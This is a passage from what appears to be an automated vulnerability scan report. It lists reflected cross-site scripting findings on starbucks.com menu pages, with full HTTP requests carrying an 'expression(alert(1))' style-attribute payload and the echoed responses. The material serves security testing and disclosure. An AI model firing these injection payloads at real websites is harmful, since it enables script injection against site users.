<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/passion?cff50"style="x:expression(alert(1))"adbc9364b13=1"/> ...[SNIP]...
1.802. http://www.starbucks.com/menu/drinks/tazo-tea/refresh [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/refresh
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ec5e"style%3d"x%3aexpression(alert(1))"8df00c156e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ec5e"style="x:expression(alert(1))"8df00c156e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/refresh?9ec5e"style%3d"x%3aexpression(alert(1))"8df00c156e8=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:40:48 GMT Connection: close Content-Length: 42359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/refresh?9ec5e"style="x:expression(alert(1))"8df00c156e8=1"/> ...[SNIP]...
1.803. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2295e"style%3d"x%3aexpression(alert(1))"d67e805d73d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2295e"style="x:expression(alert(1))"d67e805d73d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade?2295e"style%3d"x%3aexpression(alert(1))"d67e805d73d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:38:30 GMT Connection: close Content-Length: 42306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade?2295e"style="x:expression(alert(1))"d67e805d73d=1"/> ...[SNIP]...
1.804. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/shaken-iced-green-tea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 353c7"style%3d"x%3aexpression(alert(1))"a67357be292 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 353c7"style="x:expression(alert(1))"a67357be292 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/shaken-iced-green-tea?353c7"style%3d"x%3aexpression(alert(1))"a67357be292=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:41:05 GMT Connection: close Content-Length: 42111
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea?353c7"style="x:expression(alert(1))"a67357be292=1"/> ...[SNIP]...
1.805. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 860c2"style%3d"x%3aexpression(alert(1))"e6b6821f468 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 860c2"style="x:expression(alert(1))"e6b6821f468 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade?860c2"style%3d"x%3aexpression(alert(1))"e6b6821f468=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:41:10 GMT Connection: close Content-Length: 42243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade?860c2"style="x:expression(alert(1))"e6b6821f468=1"/> ...[SNIP]...
1.806. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/shaken-iced-passion-tea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b08c"style%3d"x%3aexpression(alert(1))"3cfb7a5dbfc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b08c"style="x:expression(alert(1))"3cfb7a5dbfc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/shaken-iced-passion-tea?2b08c"style%3d"x%3aexpression(alert(1))"3cfb7a5dbfc=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:40:43 GMT Connection: close Content-Length: 42165
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea?2b08c"style="x:expression(alert(1))"3cfb7a5dbfc=1"/> ...[SNIP]...
1.807. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc369"style%3d"x%3aexpression(alert(1))"2ba0c3d405d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc369"style="x:expression(alert(1))"2ba0c3d405d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade?bc369"style%3d"x%3aexpression(alert(1))"2ba0c3d405d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:41:06 GMT Connection: close Content-Length: 42340
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade?bc369"style="x:expression(alert(1))"2ba0c3d405d=1"/> ...[SNIP]...
1.808. http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81de7"style%3d"x%3aexpression(alert(1))"adf0f936755 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81de7"style="x:expression(alert(1))"adf0f936755 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea?81de7"style%3d"x%3aexpression(alert(1))"adf0f936755=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:41:22 GMT Connection: close Content-Length: 42131
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea?81de7"style="x:expression(alert(1))"adf0f936755=1"/> ...[SNIP]...
1.809. http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/vanilla-roobios-tea-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bbc"style%3d"x%3aexpression(alert(1))"9b2bce3bcc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4bbc"style="x:expression(alert(1))"9b2bce3bcc9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/vanilla-roobios-tea-latte?b4bbc"style%3d"x%3aexpression(alert(1))"9b2bce3bcc9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:41:17 GMT Connection: close Content-Length: 42522
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte?b4bbc"style="x:expression(alert(1))"9b2bce3bcc9=1"/> ...[SNIP]...
1.810. http://www.starbucks.com/menu/drinks/tazo-tea/zen [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/zen
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3af5b"style%3d"x%3aexpression(alert(1))"ab6cdbd263 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3af5b"style="x:expression(alert(1))"ab6cdbd263 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/zen?3af5b"style%3d"x%3aexpression(alert(1))"ab6cdbd263=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:41:42 GMT Connection: close Content-Length: 42134
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/zen?3af5b"style="x:expression(alert(1))"ab6cdbd263=1"/> ...[SNIP]...
1.811. http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d939"style%3d"x%3aexpression(alert(1))"080e74fafa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d939"style="x:expression(alert(1))"080e74fafa0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie?8d939"style%3d"x%3aexpression(alert(1))"080e74fafa0=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:41:57 GMT Connection: close Content-Length: 41263
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie?8d939"style="x:expression(alert(1))"080e74fafa0=1"/> ...[SNIP]...
1.812. http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ace4c"style%3d"x%3aexpression(alert(1))"ab4d40a17c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ace4c"style="x:expression(alert(1))"ab4d40a17c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie?ace4c"style%3d"x%3aexpression(alert(1))"ab4d40a17c7=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:42:46 GMT Connection: close Content-Length: 41042
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie?ace4c"style="x:expression(alert(1))"ab4d40a17c7=1"/> ...[SNIP]...
1.813. http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d51a"style%3d"x%3aexpression(alert(1))"b13ae9964f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d51a"style="x:expression(alert(1))"b13ae9964f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie?6d51a"style%3d"x%3aexpression(alert(1))"b13ae9964f3=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:42:11 GMT Connection: close Content-Length: 41086
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie?6d51a"style="x:expression(alert(1))"b13ae9964f3=1"/> ...[SNIP]...
1.814. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d32a"style%3d"x%3aexpression(alert(1))"fa0c610012d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d32a"style="x:expression(alert(1))"fa0c610012d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food?5d32a"style%3d"x%3aexpression(alert(1))"fa0c610012d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:42:35 GMT Connection: close Content-Length: 59312
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food?5d32a"style="x:expression(alert(1))"fa0c610012d=1"/> ...[SNIP]...
1.815. http://www.starbucks.com/menu/food/bakery/8-grain-roll [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/8-grain-roll
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d050a"style%3d"x%3aexpression(alert(1))"19e1c1b3a3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d050a"style="x:expression(alert(1))"19e1c1b3a3d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/bakery/8-grain-roll?d050a"style%3d"x%3aexpression(alert(1))"19e1c1b3a3d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:46:23 GMT Connection: close Content-Length: 44171
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/8-grain-roll?d050a"style="x:expression(alert(1))"19e1c1b3a3d=1"/> ...[SNIP]...
1.816. http://www.starbucks.com/menu/food/bakery/apple-bran-muffin [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/bakery/apple-bran-muffin
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b49f2"style%3d"x%3aexpression(alert(1))"d39bf9c38f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b49f2"style="x:expression(alert(1))"d39bf9c38f in the application's response.
